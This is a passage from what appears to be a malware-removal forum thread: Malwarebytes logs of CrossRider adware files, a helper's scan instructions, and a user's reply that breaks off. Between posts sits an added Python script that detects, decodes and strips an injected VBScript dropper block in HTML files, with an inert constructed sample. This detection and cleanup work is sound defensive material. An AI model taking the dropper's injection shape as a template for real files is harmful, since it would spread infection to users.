PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\30c8b8ffbca4cefb5594c643a948742d.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\46ec2a4c74fe0461a3a60604984b4704.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\57d56ec60f4db1fa15955737bea73010.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\645f7bd0b4191d57dbe3eb8c9c4743fa.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\647bc88cb26ca6bedc974d074d4c54a5.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\92ff82a28e0b7b5fa9498a4ac36cf0ea.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\9ec430247724ff1f8abb1c685d0f3e41.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\aa76783cbe26f72d0989ebb7f1458af5.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\ab92aafe090eea44afe635c843530762.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\b6288df75deb1a1e0da423c8989a680f.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\bd1fddb8e7c2c7233e86af8174c0c640.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\bf7c7a62f0a464f3a46e339f5ec099c6.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\db23ddb634b535c06fb73c202c288b4d.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\de1752a9b55f28f2979e43867ea3876b.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\df7209e025c9077312341da96af47f94.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\f123638ad581430dfdc3fe9b855494ba.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\f53e02dbfad465bc508ed33e95917081.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\fcaf309745579a3dedb0cc1a8ebfd8a9.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\installer.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults\preferences\prefs.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\manifest.xml, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins.json, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\1.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\102.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\123.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\13.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\14.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\16.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\17.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\177.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\180.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\182.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\183.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\192.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\195.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\207.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\21.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\22.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\220.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\221.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\223.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\242.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\244.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\246.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\259.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\260.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\263.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\268.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\273.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\28.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\281.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\284.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\4.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\47.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\64.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\7.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\72.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\78.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\9.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\91.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\93.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\98.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode\background.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode\extension.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale\en-US\translations.dtd, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button1.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button2.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button3.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button4.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button5.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\crossrider_statusbar.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon128.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon16.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon24.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon48.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\panelarrow-up.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\popup.html, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\skin.css, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\update.css, , [79e14d767cff2e08d130755b34ce07f9], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)


#10 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,079 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:05:54 AM

Posted 07 August 2014 - 11:40 AM

Hi jsutbee,

 

Roughly, how many html files do you have?

 

Running a Malwarebytes scan:

  • Double-click on the Malwarebytes icon on your desktop
  • The program will open; click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~
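Toffee's question about how many HTML files are involved can be answered with a script rather than a guess. What follows is an added example, not code from the thread, from BleepingComputer or from Malwarebytes: it walks a directory tree, flags every .html/.htm file that carries the injected <SCRIPT Language=VBScript> block quoted in the opening post (recognised by its DropFileName and WriteData assignments, so a page with ordinary VBScript is not counted), decodes the hex WriteData blob so the dropped executable can be hashed, and strips the block after saving a copy of the original next to it. It assumes the block closes with </SCRIPT>, which the opening post does not show, and treats an unterminated block as running to end of file; the sample page and its 20-byte "MZ" blob are constructed for the demo, not taken from the infected machine.

```python
"""Find, count and strip the VBScript dropper block injected into HTML files.
Added example (not the thread's or Malwarebytes' code). Assumes the block shape
quoted in the opening post and, unconfirmed by the page, a closing </SCRIPT>."""
import os
import re
import shutil
import tempfile

SCRIPT_OPEN = re.compile(r'<script\s+language\s*=\s*"?vbscript"?\s*>', re.IGNORECASE)
SCRIPT_CLOSE = re.compile(r"</script\s*>", re.IGNORECASE)
DROP_NAME = re.compile(r'DropFileName\s*=\s*"([^"]+)"')
WRITE_DATA = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]+)"')


def find_injection(text: str):
    """Return (start, end, dropped_name) of the injected block, or None. A VBScript
    block counts only if it has both DropFileName and WriteData, so legitimate
    IE-era VBScript in a page is not flagged. No </SCRIPT> means block runs to EOF."""
    for m in SCRIPT_OPEN.finditer(text):
        close = SCRIPT_CLOSE.search(text, m.end())
        end = close.end() if close else len(text)
        body = text[m.start():end]
        name = DROP_NAME.search(body)
        if name and WRITE_DATA.search(body):
            return m.start(), end, name.group(1)
    return None


def extract_payload(text: str):
    """Decode the hex WriteData blob (the executable the script would drop) for
    hashing or submission; never write it out as an .exe on the infected box."""
    m = WRITE_DATA.search(text)
    return bytes.fromhex(m.group(1)) if m else None


def strip_injection(text: str) -> str:
    """Remove every injected block, leaving the rest of the page untouched."""
    hit = find_injection(text)
    while hit:
        start, end, _ = hit
        text = text[:start] + text[end:]
        hit = find_injection(text)
    return text


def scan_tree(root: str, exts=(".html", ".htm")) -> list:
    """Walk root and list (path, dropped_name) for every injected HTML file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="latin-1") as fh:  # latin-1 never fails
                    found = find_injection(fh.read())
                if found:
                    hits.append((path, found[2]))
    return hits


def clean_file(path: str, backup: bool = True) -> bool:
    """Strip the block from one file (True if modified). The original is first
    copied to <path>.infected so the dropper body survives as evidence."""
    with open(path, encoding="latin-1") as fh:
        text = fh.read()
    cleaned = strip_injection(text)
    if cleaned == text:
        return False
    if backup:
        shutil.copy2(path, path + ".infected")
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(cleaned)
    return True


# Constructed sample in the shape quoted in the opening post; the hex blob is a
# 20-byte stand-in that begins with the MZ header, not a real executable.
SAMPLE_INFECTED = (
    "<html><body><p>hello</p></body></html>\n"
    "<SCRIPT Language=VBScript><!--\n"
    'DropFileName = "svchost.exe"\n'
    'WriteData = "4D5A90000300000004000000FFFF0000B8000000"\n'
    'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    "--></SCRIPT>\n"
)


def demo_on_tempdir() -> dict:
    """Write the sample into a scratch tree, then count, clean and rescan."""
    root = tempfile.mkdtemp()
    page = os.path.join(root, "site", "index.html")
    os.makedirs(os.path.dirname(page))
    for target in (page, os.path.join(root, "script.py")):  # .py must be ignored
        with open(target, "w", encoding="latin-1") as fh:
            fh.write(SAMPLE_INFECTED)
    before = scan_tree(root)
    changed = clean_file(page)
    return {"before": len(before), "dropped": before[0][1], "changed": changed,
            "after": len(scan_tree(root)), "backup": os.path.exists(page + ".infected")}
```

Run it from a clean machine against a copy of the affected files, or at least from an account that cannot execute what the script drops: the count from scan_tree is the answer to "how many", and the .infected copies keep the dropper available for a hash or a sandbox submission. Stripping the block only repairs the documents; the quarantined executables and registry entries in the Malwarebytes logs above are a separate problem that the scan and cleanup steps still have to deal with.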


#11 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 11 August 2014 - 12:42 AM

Hi Toffee,
I have been working on the infected PC for more than 2 years and I can't guess how many HTML files were there before. Lots of HTML files have already been deleted by AVG antivirus and now I think there are not too many files of that type left :( .

Approximately there may be 200-400 HTML files, as most of the files' extensions are .php and .py

Rest, here are my scan results

 

Protection Log
 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
 
Protection, 8/11/2014 10:10:06 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 10:10:06 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 10:10:06 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:12:04 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 10:12:04 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 10:12:04 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:14:47 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Update, 8/11/2014 10:28:26 AM, SYSTEM, BIKASH, Manual, Malware Database, 2014.8.8.1, 2014.8.11.1, 
Protection, 8/11/2014 10:28:30 AM, SYSTEM, BIKASH, Protection, Refresh, Starting, 
Protection, 8/11/2014 10:28:30 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopping, 
Protection, 8/11/2014 10:28:31 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopped, 
Protection, 8/11/2014 10:28:59 AM, SYSTEM, BIKASH, Protection, Refresh, Success, 
Protection, 8/11/2014 10:28:59 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:29:00 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Protection, 8/11/2014 10:39:42 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopping, 
Protection, 8/11/2014 10:39:43 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopped, 
Protection, 8/11/2014 10:39:43 AM, SYSTEM, BIKASH, Protection, Malware Protection, Stopping, 
Protection, 8/11/2014 10:40:03 AM, SYSTEM, BIKASH, Protection, Malware Protection, Stopped, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Update, 8/11/2014 10:40:42 AM, SYSTEM, BIKASH, Manual, Rootkit Database, 2014.2.20.1, 2014.8.4.1, 
Update, 8/11/2014 10:43:10 AM, SYSTEM, BIKASH, Manual, Malware Database, 2014.3.4.9, 2014.8.11.1, 
Protection, 8/11/2014 10:43:13 AM, SYSTEM, BIKASH, Protection, Refresh, Starting, 
Protection, 8/11/2014 10:43:13 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopping, 
Protection, 8/11/2014 10:43:13 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopped, 
Protection, 8/11/2014 10:43:20 AM, SYSTEM, BIKASH, Protection, Refresh, Success, 
Protection, 8/11/2014 10:43:20 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:43:21 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Protection, 8/11/2014 11:09:33 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 11:09:33 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 11:09:33 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 11:11:52 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
 
(end)
 
 
Scan Log

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/11/2014
Scan Time: 10:56:23 AM
Logfile: 
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.11.01
